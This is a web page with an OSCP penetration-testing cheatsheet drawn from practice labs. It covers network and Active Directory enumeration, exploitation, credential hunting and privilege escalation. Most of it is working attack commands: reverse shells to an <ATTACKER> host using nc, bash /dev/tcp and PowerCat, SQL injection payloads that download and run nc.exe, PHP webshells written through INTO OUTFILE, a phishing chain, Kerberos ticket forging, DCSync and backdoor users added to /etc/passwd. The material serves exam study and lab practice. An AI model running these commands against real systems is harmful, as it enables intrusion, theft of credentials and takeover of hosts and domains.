Skip to content

OSCP Cheatsheet

Labs covered

Secura · Medtech · Relia · Skylark · OSCP-A/B/C · Zeus · Poseidon · Feast · Laser · PG-Access · PG-Nagoya · PG-Bratarina · PG-ClamAV · PG-Hetemit · PG-Nibbles · PG-Payday · PG-Pebbles · PG-Pelican · PG-Snookums · PG-Algernon · PG-Craft · PG-Internal · PG-Jacko · PG-Kevin · PG-Squid · PG-Amaterasu

Enumeration

Network Scanning

Full TCP scan
# Full TCP scan (all ports, no ping)
nmap -sT -p- -T5 <TARGET> -Pn -oN <TARGET>.nmap

# Service version + default scripts
nmap -sV -sC -p <PORTS> <TARGET> -oN <TARGET>.full.nmap

# UDP — SNMP
nmap -sU -p 161 --script snmp-info <TARGET>
Checklist
  • Full TCP port scan (-p-)
  • Service/version scan on open ports (-sV -sC)
  • UDP scan — at least SNMP (161)
  • Check for unusual ports (VoIP 5060/5080, JDWP 8000, FreeSWITCH 8021)

Web Enumeration

Directory brute-force
feroxbuster -k -u http://<TARGET> -w /usr/share/wordlists/raft-large-directories.txt
feroxbuster -k -u http://<TARGET> -w ~/wordlists/SecLists/Discovery/Web-Content/Java-Spring-Boot.txt
Git dump / DNS / PDF metadata
# Exposed .git dump
git_dumper.py http://<TARGET>/.git/ ./TARGET.git

# DNS zone transfer
dig axfr <DOMAIN> @<DNS_SERVER>

# PDF metadata — username extraction
wget -r -A "*.pdf" http://<TARGET>/pdfs/
exiftool *.pdf | grep -i author
Parameter fuzzing
# Find hidden GET params
ffuf -u 'http://<TARGET>:<PORT>/endpoint?PARAM=val' \
  -w ~/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt:PARAM \
  -ms 0-15,17-9999999

# Find hidden POST params (filter by default size)
ffuf -u 'http://<TARGET>:<PORT>/verify?PARAM=val' \
  -w ~/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt:PARAM \
  -fs <DEFAULT_SIZE>

# CMS fingerprinting
whatweb <TARGET>
Checklist
  • feroxbuster directory brute-force
  • Look for exposed .gitgit_dumper.py
  • Check config files in git history (git log, git show)
  • PDF files — exiftool — usernames
  • DNS zone transfer (dig axfr)
  • Check /CHANGELOG, /debug.txt, robots.txt, /install.php
  • Check web app version — searchsploit
  • ffuf parameter fuzzing on custom API endpoints
  • Enumerate exposed Rails routes (/rails/info/routes) on dev apps
  • Check REST API help endpoints (/help, /info, /api)
  • whatweb for CMS/framework fingerprinting

SMTP / Email

User enumeration & brute-force
# User enumeration via RCPT TO
smtp-user-enum -m RCPT \
  -U ~/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt \
  <TARGET> 25

# SMTP password brute-force
hydra -l <USER> -P passwords.txt -f <TARGET> smtp -V
hydra -l <USER>@<DOMAIN> -P passwords.txt -f <TARGET> smtp -V

# POP3 brute-force
hydra -l <USER> -P passwords.txt -f <TARGET> pop3 -V
Checklist
  • SMTP user enumeration
  • SMTP/POP3 brute-force with found users
  • Read emails for credentials / internal info
  • Check Sendmail/OpenSMTPD version — searchsploit (e.g. CVE-2007-4560, CVE-2020-7247)

FTP

FTP — anonymous login
ftp <TARGET>
# Try: anonymous / anonymous
# Try: ftp / ftp
# Try: <username> / <username>

# Brute-force if anonymous fails
hydra -L users.txt -P passwords.txt ftp://<TARGET>
Checklist
  • Anonymous FTP login
  • Download all files — check for credentials, PDFs, keys
  • Brute-force if anonymous fails

SMB

Enumeration (anonymous)
# List shares
nxc smb <TARGET> -u 'anonymous' -p '' --shares

# Spider + download all files
nxc smb <TARGET> -u 'anonymous' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
Enumeration (authenticated)
# List shares
nxc smb <TARGET> -u '<USER>' -p '<PASS>' --shares

# Interactive browsing
smbclientng --host <TARGET> -u '<USER>' -p '<PASS>' -d <DOMAIN>
Spraying & execution
# Spray user list against password list
nxc smb <TARGET> -u users.txt -p passwords.txt --no-bruteforce

# Remote command execution
nxc smb <TARGET> -u '<USER>' -p '<PASS>' -x "whoami"
Checklist
  • Anonymous share access
  • Authenticated share enumeration
  • Spider all shares for sensitive files (config, docx, txt, pdf, zip, kdbx, id_rsa)
  • Check for PowerShell transcripts — credential leak
  • Check for log files — hash/credential leak
  • SMB spray all creds across network

SNMP

Community string brute-force
onesixtyone -c ~/wordlists/SecLists/Discovery/SNMP/snmp.txt <TARGET>
SNMP walk
# Standard walk
snmpwalk -c public -v1 -t 10 <TARGET> -Oa
snmp-check <TARGET>

# Extended objects — may reveal scripts/binaries with hardcoded passwords
snmpwalk -v2c -c public <TARGET> NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpwalk -v2c -c public <TARGET> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
Checklist
  • Brute-force community string
  • Full SNMP walk
  • Check NET-SNMP-EXTEND-MIB::nsExtendObjects for scripts/binaries
  • Analyze returned binaries with strings for hardcoded credentials

Database Enumeration

mysql -u root -h <TARGET>                          # No password — try first!
mysql -u <USER> -p<PASS> -h <TARGET> \
  -e "SHOW DATABASES;"
mysql -u <USER> -p<PASS> -h <TARGET> \
  -e "USE <DB>; SHOW TABLES; SELECT * FROM users;"

mssqlclient.py '<USER>:<PASS>@<TARGET>'
mssqlclient.py '<DOMAIN>/<USER>:<PASS>@<TARGET>' -windows-auth

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

mongosh <TARGET>:27017

show dbs
use admin
db.system.users.find()

psql -h <TARGET> -U postgres -p 5437     # try unauthenticated

-- RCE via COPY TO PROGRAM (requires superuser)
COPY (SELECT '') TO PROGRAM
  'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <ATTACKER> <PORT> >/tmp/f';

sqlite3 <FILE>.db

.tables
select * from <TABLE>;

-- Check version
SELECT H2VERSION() FROM DUAL;

-- JNI RCE (H2 1.4.x — EDB-49384)
CALL JNIScriptEngine_eval(
  'new java.util.Scanner(
    java.lang.Runtime.getRuntime().exec("whoami").getInputStream()
  ).useDelimiter("\\Z").next()'
);

-- Trigger mshta reverse shell
CALL JNIScriptEngine_eval(
  'new java.util.Scanner(
    java.lang.Runtime.getRuntime().exec(
      "mshta http://<ATTACKER>:8000/revshell.hta"
    ).getInputStream()
  ).useDelimiter("\\Z").next()'
);
Checklist
  • Try unauthenticated MySQL root (no password)
  • Enumerate all databases and interesting tables
  • MongoDB: try unauthenticated connection
  • MSSQL: enable xp_cmdshell — RCE
  • MSSQL: xp_dirtree — NTLMv2 capture with Responder
  • SQLite files in web app directory
  • PostgreSQL: try unauthenticated as postgresCOPY TO PROGRAM for RCE
  • H2 Database web console (port 8082): check version — JNI RCE (EDB-49384)
  • phpmyadmin exposed (via proxy): try root no password — SELECT INTO OUTFILE webshell

Squid Proxy

Proxy discovery & enumeration
# Test if proxy is open and responding
curl -v -x http://<TARGET>:3128 http://google.com

# Enumerate internal ports/services accessible via proxy
python spose.py --proxy http://<TARGET>:3128 --target <TARGET>

# Browse internal service through proxy
curl -v -x http://<TARGET>:3128 http://<TARGET>:<INTERNAL_PORT>
/etc/proxychains.conf
http <TARGET> 3128
proxychains + nmap
proxychains -q nmap -sT -Pn -n -vvv 127.0.0.1
phpmyadmin via proxy
curl -x http://<TARGET>:3128 http://<TARGET>:8080/phpmyadmin/
SQL webshell write (MySQL as SYSTEM)
SELECT "<?php system($_GET['cmd']);?>"
INTO OUTFILE "C:/wamp/www/shell.php";
Checklist
  • Port 3128 open — Squid proxy — enumerate accessible internal services with spose.py
  • Access internal web services through proxy (curl -x)
  • Check for phpmyadmin on internal port — root no password — SELECT INTO OUTFILE webshell
  • Check phpinfo() — find DOCUMENT_ROOT — write webshell to correct path
  • Use proxychains + nmap for full internal port scan

Active Directory Enumeration

AD Recon

# BloodHound collection
bloodhound-ce-python -d <DOMAIN> -u '<USER>' -p '<PASS>' \
  -ns <DC_IP> -c All --zip

# Domain SID enumeration
lookupsid.py '<DOMAIN>/<USER>:<PASS>@<DC_IP>' 0

# Username enumeration (no creds needed)
kerbrute userenum --dc <DC_IP> -d <DOMAIN> users.txt

# Password spray (season passwords: Spring2023, Summer2024, etc.)
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> users.txt "Spring2023"

net user /domain
Get-AdUser -Filter *
get-adtrust -filter *
schtasks /query /fo LIST /v | findstr /v "Microsoft" | findstr /v "N/A"

Always run BloodHound first

Mark owned nodes immediately and use pathfinding to DA before trying any manual AD attacks.

Checklist
  • BloodHound full collection
  • kerbrute userenum — valid username list (no creds needed)
  • kerbrute passwordspray — season/default passwords against all users
  • Check BloodHound for: DA path, GenericAll, WriteDACL, Backup Operators, DCSync rights
  • Enumerate scheduled tasks
  • Check AD trusts (get-adtrust -filter *)
  • Domain SID enumeration for inter-forest attacks

Kerberoasting & ASREPRoasting

Kerberoasting
GetUserSPNs.py -request -outputfile kerberoastable.txt \
  -dc-ip <DC_IP> '<DOMAIN>/<USER>:<PASS>'
hashcat -m 13100 kerberoastable.txt ~/wordlists/rockyou.txt
ASREPRoasting
GetNPUsers.py -request -format hashcat -outputfile asreproastable.txt \
  -dc-ip <DC_IP> '<DOMAIN>/<USER>:<PASS>'
hashcat -m 18200 asreproastable.txt ~/wordlists/rockyou.txt
Enumerate SPNs
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
foreach ($result in $results) {
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User:" $userEntry.name
    foreach ($SPN in $userEntry.servicePrincipalName) {
        Write-Host "SPN:" $SPN
    }
}
Request TGS + export
# Request TGS ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
  -ArgumentList '<SPN>'

# Export tickets (Mimikatz)
.\mimikatz "kerberos::list /export"

# Or use Invoke-Kerberoast
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Domain <DOMAIN> -OutputFormat Hashcat | fl

python kirbi2john.py <TICKET>.kirbi > <TICKET>.hash
john --wordlist=~/wordlists/rockyou.txt <TICKET>.hash
Checklist
  • Kerberoasting — hashcat -m 13100
  • ASREPRoasting — hashcat -m 18200
  • Manual Kerberoasting from Windows foothold (no impacket)

ACL / BloodHound-Driven Attacks

GenericAll — Force Password Change
bloodyAD -d <DOMAIN> --dc-ip <DC_IP> -u '<USER>' -p '<PASS>' \
  set password '<TARGET_USER>' 'P@ssword2026'
GenericAll — Targeted Kerberoasting (fake SPN)
bloodyAD -d <DOMAIN> --dc-ip <DC_IP> -u '<USER>' -p '<PASS>' \
  set object '<TARGET_USER>' servicePrincipalName -v 'FAKESPN/test'
nxc ldap <DC_IP> -u '<USER>' -p '<PASS>' --kerberoasting kerberoasted.txt
hashcat -m 13100 kerberoasted.txt ~/wordlists/rockyou.txt
WriteDACL — Grant DCSync rights
python dacledit.py -action 'write' -rights 'DCSync' \
  -principal '<USER>' -target-dn 'DC=domain,DC=com' \
  '<DOMAIN>/<USER>:<PASS>'
secretsdump.py '<DOMAIN>/<USER>:<PASS>@<DC_IP>'

Chain example — Nagoya lab

# 1. Spray -> low-priv user
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> users.txt "Spring2023"

# 2. Force password along ACL chain
bloodyAD -d <DOMAIN> --dc-ip <DC_IP> \
  -u 'Craig.Carr' -p 'Spring2023' \
  set password 'svc_helpdesk' 'P@ssword2026'

bloodyAD -d <DOMAIN> --dc-ip <DC_IP> \
  -u 'svc_helpdesk' -p 'P@ssword2026' \
  set password 'christopher.lewis' 'P@ssword2026'

# 3. Test WinRM access
nxc winrm <DC_IP> -u adusers.txt -p adpasswords.txt \
  --no-bruteforce --continue-on-success
Checklist
  • BloodHound: mark owned nodes, find DA path
  • Check for: GenericAll, WriteDACL, ForceChangePassword, AddSelf, WriteOwner
  • Force password change on target accounts (GenericAll)
  • Targeted Kerberoasting via fake SPN
  • WriteDACL — grant DCSync rights — secretsdump

GPO Abuse

pygpoabuse — create local admin
pygpoabuse.py '<DOMAIN>/<USER>:<PASS>' \
  -gpo-id "<GPO-GUID>" \
  -dc-ip <DC_IP>
# Creates local admin: john:H4x00r123..
Force GPO update on target
gpupdate /force
Checklist
  • Check BloodHound for GPO write permissions — pygpoabuse.py
  • Force GPO update after abuse

Silver Ticket

# Forge ticket
ticketer.py \
  -nthash '<SERVICE_NTHASH>' \
  -domain-sid '<DOMAIN_SID>' \
  -domain '<DOMAIN>' \
  -spn 'MSSQLSvc/<HOST>.<DOMAIN>' \
  'Administrator'

export KRB5CCNAME="$(pwd)/Administrator.ccache"

# Connect and enable xp_cmdshell -> RCE -> SeImpersonate -> GodPotato
mssqlclient.py -k -no-pass <HOST>.<DOMAIN>

# Forge ticket
ticketer.py \
  -nthash '<MACHINE_NTHASH>' \
  -domain-sid '<DOMAIN_SID>' \
  -domain '<DOMAIN>' \
  -spn 'cifs/<HOST>.<DOMAIN>' \
  'Administrator'

export KRB5CCNAME="$(pwd)/Administrator.ccache"
psexec.py -k -no-pass <HOST>.<DOMAIN>

No DA required

Silver Tickets only need the service account NT hash — not domain admin rights. Very useful when Kerberoasting yields a cracked service account hash.

Checklist
  • Get service account NT hash (secretsdump / Kerberoasting crack)
  • Get domain SID (lookupsid.py or whoami /user)
  • Forge Silver Ticket for MSSQL or CIFS — gain access without DA

Inter-Forest Trust Abuse (SID History)

Enumerate trust
lookupsid.py '<DOMAIN>/<USER>:<PASS>@<DC_IP>' 0
Forge inter-realm ticket with extra SID
ticketer.py \
  -aesKey <AES256_KEY> \
  -domain <CHILD_DOMAIN> \
  -domain-sid <CHILD_DOMAIN_SID> \
  -extra-sid <PARENT_DOMAIN_SID>-519 \
  -extra-pac \
  'Administrator'
Enumerate trust
get-adtrust -filter *
Forge golden ticket with extra SID (Rubeus)
.\Rubeus.exe golden \
  /aes256:<KEY> \
  /domain:<DOMAIN> \
  /sid:<DOMAIN_SID> \
  /sids:<EXTRA_SID>-519 \
  /ptt

DCSync

DCSync — password / hash
secretsdump.py '<DOMAIN>/<USER>:<PASS>@<DC_IP>'
secretsdump.py '<DOMAIN>/<USER>@<DC_IP>' -hashes ':<NTHASH>'

Backup Operators path

Backup Operators can reset the machine account password of the DC and then DCSync without being Domain Admin.

bloodyAD -d <DOMAIN> --dc-ip <DC_IP> \
  -u '<BACKUP_OP_USER>' -p '<PASS>' \
  set password 'DC02$' 'P@ssword2026'

secretsdump.py '<DOMAIN>/<DC_MACHINE_ACCT>$:<PASS>@<DC_IP>'

Exploitation

Password Attacks

# SSH
hydra -l <USER> -P ~/wordlists/rockyou.txt ssh://<TARGET>
hydra -L users.txt -P passwords.txt ssh://<TARGET>

# FTP
hydra -L users.txt -P passwords.txt ftp://<TARGET>

# HTTP Basic Auth
hydra -L users.txt -P passwords.txt <TARGET> http-get -V

nxc winrm <TARGET> -u users.txt -p passwords.txt --no-bruteforce
nxc rdp   <TARGET> -u users.txt -p passwords.txt --no-bruteforce
nxc wmi   <TARGET> -u users.txt -p passwords.txt --no-bruteforce
nxc smb   <TARGET> -u users.txt -p passwords.txt --no-bruteforce

# SSH key
ssh2john <KEY_FILE> > <KEY_FILE>.hash
john --wordlist=~/wordlists/rockyou.txt <KEY_FILE>.hash

# ZIP
zip2john <FILE>.zip > <FILE>.hash
john --wordlist=~/wordlists/rockyou.txt <FILE>.hash

# KeePass
keepass2john <FILE>.kdbx > <FILE>.hash
hashcat -m 13400 <FILE>.hash ~/wordlists/rockyou.txt

hashcat -m 0     <HASH> ~/wordlists/rockyou.txt   # MD5
hashcat -m 400   <HASH> ~/wordlists/rockyou.txt   # WordPress phpass
hashcat -m 1800  <HASH> ~/wordlists/rockyou.txt   # SHA-512 crypt ($6$)
hashcat -m 5600  <HASH> ~/wordlists/rockyou.txt   # NTLMv2
hashcat -m 13100 <HASH> ~/wordlists/rockyou.txt   # Kerberoast TGS-REP
hashcat -m 18200 <HASH> ~/wordlists/rockyou.txt   # ASREPRoast
hashcat -m 13400 <HASH> ~/wordlists/rockyou.txt   # KeePass
Checklist
  • Spray all found credentials against all services
  • Crack all captured hashes (NTLMv2, TGS, ASREPRoast, MD5, phpass)
  • Try password reuse across users and machines
  • Crack SSH/ZIP/KeePass if found
  • Try default credentials (admin:admin, root:(empty), user:user)

Web Application Exploitation

SQL Injection — MSSQL RCE

Detection
POST /login.aspx

UsernameTextBox=admin'
Time-based blind
POST /login.aspx

UsernameTextBox=';WAITFOR+DELAY+'0:0:5'+--
Enable xp_cmdshell + reverse shell
POST /login.aspx

UsernameTextBox=';EXEC+xp_cmdshell+"curl+<ATTACKER>:443"--+
UsernameTextBox=';EXEC+xp_cmdshell+"curl+-o+c:\temp\nc.exe+http://<ATTACKER>/nc.exe"--+
UsernameTextBox=';EXEC+xp_cmdshell+"c:\temp\nc.exe+<ATTACKER>+4444+-e+cmd"--+

CVE / Exploit Reference

Apache / Java
Apache 2.4.49 Path Traversal (CVE-2021-41773)
bash 50383.sh <TARGET> /etc/passwd
bash 50383.sh <TARGET>:8000 /home/<USER>/.ssh/id_ecdsa
Apache Commons Text4Shell (CVE-2022-42889)
# URL param: ?query=${script:javascript:java.lang.Runtime.getRuntime().exec("...")}
msf > use exploit/multi/http/apache_commons_text4shell
JDWP RCE (port 8000)
jdwp-shellifier.py \
  --target <TARGET> \
  --port 8000 \
  --break-on 'java.lang.String.indexOf' \
  --cmd '<REVERSE_SHELL_CMD>'
CMS / Web Frameworks
osCommerce 2.3.4.1 RCE (EDB-44374)
# POST to /install.php -> webshell
Umbraco CMS RCE (EDB-49488)
python 49488.py \
  -i 'http://<TARGET>:<PORT>' \
  -u '<EMAIL>' -p '<PASS>' \
  -c 'powershell.exe' \
  -a '-e <B64_SHELL>'
VestaCP RCE
python3 vesta-rce-exploit.py https://<TARGET>:8083 <USER> <PASS>
RiteCMS v3 Authenticated File Upload (EDB-50616)
Login admin:admin -> Files Manager -> Upload PHP webshell
ZoneMinder 1.29/1.30 SQLi -> webshell (EDB-41239)
-- POST: view=request&request=log&task=query&limit=100;
(SELECT "<?php system($_GET['cmd']);?>"
 INTO OUTFILE "/var/www/html/s.php") --
ZooKeeper Exhibitor UI RCE (EDB-48654) — port 8080
Web UI > Config > java.env script
Inject reverse shell in the export line:

export JAVA_OPTS="-Xms1000m -Xmx1000m" \
  $(/bin/bash -i >& /dev/tcp/<ATTACKER>/<PORT> 0>&1)
Simple PHP Photo Gallery 0.8 LFI/RCE (EDB-7786)
curl http://<TARGET>/image.php?img=http://<ATTACKER>:<PORT>/rev.php
CS-Cart — template editor webshell
admin:admin -> http://<TARGET>/admin.php?target=template_editor
Upload .phtml webshell via template editor
ODT Macro -> Windows reverse shell (LibreOffice server-side)
python mmg-odt.py windows <ATTACKER> <PORT>
Mail / Network Services
OpenSMTPD RCE (CVE-2020-7247) — unauthenticated root RCE
# https://github.com/FiroSolutions/cve-2020-7247-exploit
echo "root:pwned" | /usr/sbin/chpasswd
Sendmail 8.13.4 RCE (CVE-2007-4560 / EDB-4761) — bind shell on 31337
perl 4761.pl <TARGET>
nc -v <TARGET> 31337
FreeSWITCH mod_sofia RCE (EDB-47799)
python 47799.py <TARGET> whoami
Aerospike DB 5.1.0.3 (CVE-2020-13151 / EDB-49067)
python cve2020-13151.py \
  --ahost <TARGET> \
  --netcatshell \
  --lhost <ATTACKER> \
  --lport 80
Windows-specific
SmarterMail < 16 build 6985 RCE (EDB-49216) — port 17001
searchsploit -m 49216
python 49216.py
# -> nt authority\system reverse shell
HP Power Manager BoF (CVE-2009-2685 / EDB-10099) — port 80
# msfvenom payload: windows/shell_reverse_tcp
# alpha_mixed encoder, badchars: '\x00\x1a\x3a...'
Fodhelper UAC Bypass (EDB-49601)
python 49601-python3.py <TARGET> <ATTACKER> payload.bat
File upload — Windows dot-appending bypass
Content-Disposition: filename="pshell.php......"
Checklist
  • Check web app version — searchsploit / ExploitDB
  • SQLi detection (login forms, search fields, GET params)
  • MSSQL — xp_cmdshell enable — RCE
  • File upload — PHP webshell (try .pHP, .php5, .phtml to bypass filter)
  • File upload — Windows dot-trailing bypass (shell.php......)
  • File upload — ODT macro — Windows reverse shell (LibreOffice server-side)
  • LFI/RFI — read /etc/passwd, SSH keys, config files
  • Default credentials (admin:admin, admin:password)
  • Exposed /install.php — reinstall — RCE
  • OpenSMTPD (port 25) — CVE-2020-7247 unauthenticated RCE
  • Sendmail 8.13.4 (port 25) — CVE-2007-4560 — bind shell on 31337
  • SmarterMail — EDB-49216 — SYSTEM shell via .NET remote interface (port 17001)
  • ZooKeeper Exhibitor UI (port 8080) — java.env injection — RCE
  • ZoneMinder — stacked SQLi — INTO OUTFILE webshell
  • H2 Database web console (unauthenticated) — JNI RCE — mshta payload

NTLMv2 Capture & Relay

Passive capture (Responder)
sudo python Responder.py -I tun0
Force auth — various methods
# From Windows host
net use \\<ATTACKER_IP>

# Via MSSQL xp_dirtree
EXEC master..xp_dirtree '\\<ATTACKER_IP>\share';
LNK coercion via SMB share
# Generate LNK file
ntlm_theft.py -g lnk -s <ATTACKER_IP> -f Services

# Drop it into a share via nxc
nxc smb <TARGET> -u '<USER>' -p '<PASS>' \
  -M slinky -o NAME="Apps" SERVER="<ATTACKER_IP>"
NTLMRelay (SMB signing disabled)
sudo ntlmrelayx.py -smb2support -t smb://<TARGET_IP> -i
# Connect to port 11000 for interactive SMB shell
nc 127.0.0.1 11000

Always start Responder first

Launch Responder before interacting with any Windows host — passive capture costs nothing.

Checklist
  • Start Responder before any Windows interaction
  • Check SMB signing — if disabled, try NTLMRelay
  • xp_dirtree via MSSQL — NTLMv2 capture
  • Drop LNK files in SMB shares (slinky / ntlm_theft)
  • Crack captured NTLMv2 with hashcat (-m 5600)

Phishing (Internal)

1. Host WebDAV server
sudo docker run --rm -it -p 80:8080 \
  -v $(pwd):/var/wsgidav-root \
  mar10/wsgidav
2. Shortcut payload (on WebDAV)
# Shortcut calls PowerCat over HTTP
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER>/powercat.ps1'); powercat -c <ATTACKER> -p 4444 -e powershell"
3. Send phishing email via SMTP
sendEmail \
  -t <TARGET>@<DOMAIN> \
  -f <SENDER>@<DOMAIN> \
  -s <MAIL_SERVER>:25 \
  -u "Important problems" \
  -a ./config.Library-ms \
  -m ./body.txt \
  -xu <SMTP_USER> -xp '<SMTP_PASS>' -v
Checklist
  • Enumerate SMTP users / valid addresses
  • Craft .Library-ms — WebDAV — shortcut — reverse shell
  • Host PowerCat + WebDAV server
  • Send phishing email with authenticated SMTP

Post-Exploitation

Credential Hunting

PowerShell history
type C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PuTTY saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search files for credentials
Get-ChildItem -Path C:\ -Include *.txt,*.config,*.xml,*.ini,*.ps1 `
  -Recurse -ErrorAction SilentlyContinue |
  Select-String -Pattern "password|passwd|pass|secret|cred"
Environment variables
dir env:
Web config files
type C:\inetpub\wwwroot\web.config
type C:\xampp\htdocs\*\*.php | findstr -i "password\|DB_"
Windows autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Shell history
cat ~/.bash_history ~/.history ~/.zsh_history
Cron jobs
cat /etc/cron* /var/spool/cron/* /etc/crontab
Config files & keys
find / -name "*.conf" -o -name "*.config" 2>/dev/null \
  | xargs grep -l "password" 2>/dev/null
find / -name "id_rsa" -o -name "id_ecdsa" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null
find / -name "doas.conf" 2>/dev/null
Hardcoded passwords in scripts
cat /root/createbackup.sh /root/rsync.sh
Internal services
ss -tulpn          # Linux
sockstat -4 -l     # FreeBSD

Double-encoded passwords

Some web apps store passwords base64-encoded twice: 

echo -n '<B64>' | base64 -d | base64 -d

Memory dump for running processes

If a password manager or credential process is running as root: 

sudo gcore <PID>
strings core.<PID> | grep -A2 -B2 -i "password"

Checklist
  • PowerShell history
  • PuTTY registry sessions
  • Autologon registry keys
  • Web config files (web.config, .env, database.php, configure.php, db.php)
  • Git history for deleted files (git log --all, git show <HASH>)
  • Shell history files
  • Bash/cron scripts with hardcoded passwords
  • KeePass .kdbx files
  • SSH private keys (id_rsa, id_ecdsa)
  • Environment variables
  • SMB log files (PowerShell transcripts, app logs)
  • strings on binaries/scripts for hardcoded credentials
  • Database config files — MySQL root password — reuse as system password
  • Running password manager processes — gcore <PID> + strings

Windows Privilege Escalation

SeImpersonatePrivilege — GodPotato

Check privileges
whoami /all   # Look for SeImpersonatePrivilege
GodPotato — SYSTEM
curl -s -o gp.exe http://<ATTACKER>:8000/GodPotato-NET4.exe

.\gp.exe -cmd "cmd /c whoami"
.\gp.exe -cmd "cmd /c net user pwned P@ssword2026 /add"
.\gp.exe -cmd "cmd /c net localgroup Administrators pwned /add"
.\gp.exe -cmd "cmd /c net localgroup ""Remote Management Users"" pwned /add"
.\gp.exe -cmd "C:\temp\nc.exe <ATTACKER> 4444 -e cmd.exe"

Lost SeImpersonate (Network/Local Service)

When spawned from a web app, service accounts may have lost SeImpersonatePrivilege. Restore it with FullPowers.exe first:

curl -o FullPowers.exe http://<ATTACKER>:8000/FullPowers.exe
.\FullPowers.exe -c "C:\temp\nc.exe <ATTACKER> 4444 -e cmd.exe"
# From new shell with full privileges -> GodPotato

Scheduled Tasks & Service Binary Replacement

Identify scheduled tasks & services
schtasks /query /fo LIST /v | findstr /v "Microsoft" | findstr /v "N/A"
Get-WmiObject win32_service | select Name, PathName, StartMode | ogv
Replace scheduled task binary
move backup.exe backup.exe.bak
curl -o backup.exe http://<ATTACKER>/adduser.exe
Replace service binary
Stop-Service GPGOrchestrator
# Replace GPGService.exe with msfvenom payload
Start-Service GPGOrchestrator

DLL Hijacking / Unquoted Service Path

Find unquoted paths
Get-WmiObject win32_service |
  Where-Object {$_.PathName -notlike '"*'} |
  select Name, PathName
Check directory permissions
icacls "C:\Program Files\<SERVICE>\"

Scheduled Task Privilege Recovery (Manual FullPowers Alternative)

Register task as LOCALSERVICE with full token privileges
$Privs = "SeAssignPrimaryTokenPrivilege","SeAuditPrivilege",
         "SeChangeNotifyPrivilege","SeCreateGlobalPrivilege",
         "SeImpersonatePrivilege","SeIncreaseQuotaPrivilege",
         "SeShutdownPrivilege","SeIncreaseWorkingSetPrivilege",
         "SeTimeZonePrivilege"

$Principal = New-ScheduledTaskPrincipal `
  -UserId "LOCALSERVICE" `
  -LogonType ServiceAccount `
  -RequiredPrivilege $Privs

$Action = New-ScheduledTaskAction `
  -Execute "powershell.exe" `
  -Argument "-Exec Bypass -Command ""C:\temp\nc.exe -nlp 7777 -e cmd"""

Register-ScheduledTask -Action $Action -Principal $Principal -TaskName "TokenTask"
Start-ScheduledTask -TaskName "TokenTask"

# Connect to bind shell -> full privileges -> GodPotato
.\nc.exe -n 127.0.0.1 7777

Miscellaneous Windows PrivEsc

# https://github.com/CsEnox/SeManageVolumeExploit
.\SeManageVolumeExploit.exe
# Drops shell.dll into System32 -> use with PrintSpoofer
# Or: directly read proof.txt / SAM after exploit grants full volume access
Download via Evil-WinRM
download C:\windows.old\windows\system32\config\SAM
download C:\windows.old\windows\system32\config\SYSTEM
Offline dump on attacker
secretsdump.py -sam SAM -system SYSTEM LOCAL

curl -o C:\xampp\htdocs\webshell.php http://<ATTACKER>/p0wny_windows.pHP
# Access via browser -> nt authority\system
Checklist — Windows PrivEsc
  • whoami /all — check for SeImpersonatePrivilege (GodPotato)
  • whoami /all — check for SeManageVolumePrivilege (SeManageVolumeExploit)
  • Scheduled tasks running as SYSTEM — binary replacement
  • Service binary replacement (writable path)
  • DLL hijacking (unquoted service paths)
  • Autologon registry credentials
  • windows.old SAM/SYSTEM — offline hash dump
  • XAMPP/Apache service writing to htdocs
  • Backup Operators group — machine account password reset — DCSync
  • Network/Local Service with lost privileges — FullPowers.exe — restore SeImpersonate — GodPotato
  • Scheduled task privilege recovery (manual FullPowers alternative)

Linux Privilege Escalation

sudo / SUID / Capabilities

Check sudo rights
sudo -l
GTFOBins — openvpn
sudo openvpn --dev null --script-security 2 --up '/bin/sh -s'
GTFOBins — borg backup
sudo borg extract @:/::: --rsh "/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'"
SUID screen 4.5.0
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
/tmp/rootshell
Find SUID binaries & capabilities
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# if cap_setuid+ep --> vulnerable

CVE-Based

CVE-2021-3156 Baron Samedit (sudo <= 1.8.31, Ubuntu 20.04)
python3 exploit_nss.py
CVE-2021-4034 PwnKit (pkexec)
./pwnkit_exploit

Cron Attacks

Monitor cron with pspy
./pspy64
Tar wildcard injection
# Cron job: tar czf backup.tgz /backup/*
cd /backup
touch './--checkpoint=1'
touch './--checkpoint-action=exec=sh shell.sh'
cat > shell.sh << 'EOF'
bash -i >& /dev/tcp/<ATTACKER>/4444 0>&1
EOF
Fake tar in writable PATH directory
# /etc/crontab: */1 * * * * root /usr/local/bin/backup-flask.sh
# Script calls 'tar' without full path; PATH includes /home/<USER>/restapi

cat > /home/<USER>/restapi/tar << 'EOF'
#!/bin/bash
echo "root2:$(openssl passwd <PASS>):0:0:root:/root:/bin/bash" >> /etc/passwd
EOF
chmod +x /home/<USER>/restapi/tar
# Wait 1 minute -> su root2
Hijack command called by SUID binary
